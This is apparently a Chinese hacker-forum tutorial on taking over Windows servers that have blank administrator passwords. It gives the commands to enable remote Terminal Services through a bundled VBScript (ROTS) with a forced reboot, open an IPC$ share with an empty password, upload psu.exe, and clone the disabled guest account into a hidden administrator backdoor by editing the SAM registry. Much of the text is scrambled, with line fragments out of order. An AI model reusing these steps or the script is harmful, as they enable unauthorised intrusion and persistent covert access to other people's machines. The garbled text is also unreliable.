首先,要入侵,你得有
X-Scan V2.3、WINNTAutoAt 工具!我向大家推荐几款软件,
tack、流光! 也是我一直用的东西!扫描的
X-Scan我最近很少用了
!远程开终端需要一个脚本
克隆帐户用个psu就可以了~ ,基本用的都是WINNTAutoAttac
就可以了,代码请看二楼!保存
! k,当然,小榕的流光我也经常用
为*.vbe(我保存的是rots.vbe)
OK,比如扫描到了一个
administrator,密码为空 有NT弱口令的服务器,IP地址是
运行CMD(2000下的DOS),我们 120.0.0.1,管理员帐户是
给它开终端!
命令如下!
cscript rots.vbe 120.0.0.1 admin istrator "" 3389 /fr
上面的命令应该可以理解吧?cscrip
户,接这是密码,因为120.0.0.1这台服
再后面是端口,你可以任意设置终端的端
你也可以/r,这是普通重启) t rots.vbe这是命令,后面的是IP,然后是管理员帐
务器的管理员密码是空的,那就用双引号表示为空,
口,/fr是重启命令(强制重启,一般我都用这个,
因为终端服务器只在wi
,此版本可以检测服务器的 n2000 server以上的版本(包括
版本,如果是PRO的则提示你退 server)才有,PRO当然是不行的
出安装!
一切顺利,过会就可以连接到终端了
-t安装后用连接工具连接终端!现在我们 ,我们可以ping它,看是否重启,ping 120.0.0.1
克隆帐户,呵呵,为了给以后方便嘛!
回到DOS下!我们建立IPC$连接!
net use \\120.0.0.1\ ipc$ "" /user:"administrator "
这个命令我想应该可以
目录下! 理解吧!命令完成后,我们把ps u上传到目标机的winnt\system32
copy psu.exe \\120.0 .0.1\admin$\system32
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入
psu -p regedit -i PID
这里解释一下,后面的PID是系统进
务管理器!看进程选项卡,找到winlogon
5458那么,命令就是这样 程winlogon的值,我们在任务栏下点鼠标右键,看任
的进程,后面的数值就是winlogon的pid值,假设是
psu -p regedit -i 5458
这样直接打开注册表,可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE\SAM\S
息了!我们要做的是把禁用的guest克隆
_LOCAL_MACHINE\SAM\SAM\Domains\Accou
再看guest的是if5好了,知道了类型后,
AM\SAM\Domains\Account\Users\000001F
下来,然后打开HKEY_LOCAL_MACHINE\SAM
,把刚复制的粘贴到里面! AM\Domains\Account\Users下面的就是本地的用户信
成管理员权限的帐户!HKEY
nt\Users\Names查看administrator的类型,是if4,
打开HKEY_LOCAL_MACHINE\S
4这个值,双击右侧的F,把里面乱七八糟的字符复制
\SAM\Domains\Account\Users\000001F5双击右侧的F
做好了以后,把HKEY_L
HKEY_LOCAL_MACHINE\SAM\S
把那两个键值删除!然后再 OCAL_MACHINE\SAM\SAM\Domains
AM\Domains\Account\Users\Nam
导入进来!关闭注册表。 \Account\Users\000001F5和
es\Guest这两个键值导出,导出后
打开CMD,在命令行下输入
net user guest password
这条命令是给guest设置密码,后面的password就是密码
然后输入
net user guest /active:y
这命令是激活guest帐户,然后我们把他禁用
net user guest /active:n
上面的三行命令必须在DOS下执行!
OK了,打开计算机管理
拥有管理员权限了!而且并
样的! ,看用户,你们看,guest帐户
不在管理员组里显示,还可以登 还是被禁用的~!哈哈,但它已经
陆终端,跟administrator帐户一
注销一下,用guest登陆吧!
打字都打累了~!真不容易!呵呵~希望上面的大家能看懂啊!
如果还有地方不明白的话,可以问我,我知道的一定告诉大家!
因为本人也是菜鸟级的,会了点东西
请高手指点啊~! 就不知道怎么好了,呵呵~`!如果哪里有不对的,还
-------------------- ---------------------------- ----------------------
以下是开终端的脚本,把它存为*.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscr ipt.fullname,11))="wscript.e xe") then
set objShell=wscript.createOb ject("wscript.shell")
objShell.Run("cmd
criptfullname&chr(34)) .exe /k cscript //nologo "&c hr(34)&wscript.s
wscript.quit
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
port=wscript.arguments(3)
else
port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of p ort is error."
wscript.quit
end if
if wscript.arguments.count>4 then
reboot=wscript.arguments(4)
else
reboot=""
end if
usage()
outstreem.write "Con neting "&ipaddress&" ...."
set objlocator=creat eobject("wbemscripting.swbem locator")
set objswbemservices=objlocator.
"root/cimv2",username,password) connectserver(ipaddress,
showerror(err.number)
objswbemservices.sec urity_.privileges.add 23,tru e
objswbemservices.security_.privi leges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemser
win32_operatingsystem") vices.execquery("select caption from
for each objinstosca ption in colinstoscaption
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo " OS type is "&objinstoscaptio n.caption
outstreem.write "Do you wa nt to cancel setup?[y/n]"
strcancel=instreem.readline
if lcase(strcancel)<>"n" then wscript.quit
end if
next
outstreem.write "Writing into re gistry ...."
set objinstreg=objlo
,username,password).get( cator.connectserver(ipaddres
"stdregprov") s,"root/default"
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWAR E\Microsoft\Windows\CurrentV ersion\netcache"
.setdwordvalue HKLM,
etcache","Enabled",0 "SOFTWARE\Microsoft\Windows\ CurrentVersion\n
.createkey HKLM,"SOF TWARE\Policies\Microsoft\Win dows\Installer"
.setdwordvalue HKLM,
er","EnableAdminTSRemote "SOFTWARE\Policies\Microsoft
",1 \Windows\Install
.setdwordvalue HKLM,"SYSTEM\Curr
Server","TSEnabled",1 entControlSet\Control\Terminal
.setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Se rvices\TermDD","Start",2
.setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Se rvices\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Ke yboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,
erver\WinStations\RDP-Tc "SYSTEM\CurrentControlSet\Co
p","PortNumber",port ntrol\Terminal S
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or reb t="\r" then flag=2
if rebt="/fr" or reb t="-fr" or rebt="\fr" then f lag=6
if flag<>0 then
outstreem.write " Now, reboot target...."
strwqlquery="select * from wi n32_operatingsystem where primary='true'"
set colinstances= objswbem, services.execquery(s trwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(flag)
next
showerror(err.number)
else
wscript.echo "You need to reb oot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon term inal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
wscript.echo "Err or 0x"&cstr(hex(err.number)) &" ."
if err.description <> "" then
wscript.echo "Error descri ption: "&err.description&"."
end if
wscript.quit
else
wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Termin al services Script, by 草哲"
wscript.echo "Welcome to visite www.5458.net"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.
[port] [/r|/fr]" scriptfullname&" targetIP username password
wscript.echo "port: default numb er is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: a uto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function